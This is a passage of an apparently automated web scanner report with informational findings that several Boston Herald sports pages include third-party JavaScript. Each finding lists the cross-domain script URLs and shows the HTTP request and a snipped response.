<div style="margin-bottom: 10px; margin-left: 8px;">
<script type="text/javascript" src="http://cdn.cinesport.com/container.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.725. http://www.bostonherald.com/sports/college/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/sports/college/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sports.ap.org/college-football/moduleif.ashx?mid=APPollModule&key=new&ap_poll_type=mypoll&width=315&mod_tpl=modulewidgets&mod_ii=true&mod_tracker=true&ap_code=cj120705K&height=475

Request

GET /sports/college/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:05:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 74402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>


<script src="http://sports.ap.org/college-football/moduleif.ashx?mid=APPollModule&key=new&ap_poll_type=mypoll&width=315&mod_tpl=modulewidgets&mod_ii=true&mod_tracker=true&ap_code=cj120705K&height=475"
type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.726. http://www.bostonherald.com/sports/columnists/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/sports/columnists/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /sports/columnists/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:58:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 61999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.727. http://www.bostonherald.com/sports/columnists/view/20110128its_time_for_real_bargaining_nfl/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/sports/columnists/view/20110128its_time_for_real_bargaining_nfl/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /sports/columnists/view/20110128its_time_for_real_bargaining_nfl/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:57:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.728. http://www.bostonherald.com/sports/football/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/sports/football/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://cdn.cinesport.com/container.js
http://edge.quantserve.com/quant.js
http://www.sportsnetwork.com/aspdata/clients/herald/nflministandings.aspx?id=077
http://www.sportsnetwork.com/aspdata/clients/herald/nflschedule.aspx?id=077
http://www.sportsnetwork.com/aspdata/clients/herald/nflteamleaders.aspx?id=077

Request

GET /sports/football/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:53:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 65339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div style="margin-bottom: 10px; margin-left: 8px;">
<script type="text/javascript" src="http://cdn.cinesport.com/container.js"></script>
...[SNIP]...
<div>
<script LANGUAGE="JavaScript" SRC="http://www.sportsnetwork.com/aspdata/clients/herald/nflschedule.aspx?id=077"></script>
...[SNIP]...
<div style="padding:5px; border-top:solid 1px #ddd;border-left:solid 1px #ddd;border-right:solid 1px #ddd;">
<script LANGUAGE="JavaScript" SRC="http://www.sportsnetwork.com/aspdata/clients/herald/nflministandings.aspx?id=077"></script>
...[SNIP]...
<div style="padding:5px; border-top:solid 1px #ddd;border-left:solid 1px #ddd;border-right:solid 1px #ddd;">
<script LANGUAGE="JavaScript" SRC="http://www.sportsnetwork.com/aspdata/clients/herald/nflteamleaders.aspx?id=077"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.729. http://www.bostonherald.com/sports/football/patriot_moments/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/sports/football/patriot_moments/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /sports/football/patriot_moments/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:54:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 27253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.730. http://www.bostonherald.com/sports/football/patriots/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/sports/football/patriots/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

18.731. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:53:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 96220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.732. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/srvc=home&position=7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/srvc=home&position=7

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/srvc=home&position=7 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:51:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 48286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.733. http://www.bostonherald.com/sports/golf/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/sports/golf/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://www.sportsnetwork.com/aspdata/clients/herald/golfleaderboard.aspx?sportcode=BE,id=

Request

GET /sports/golf/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:07:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 74397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
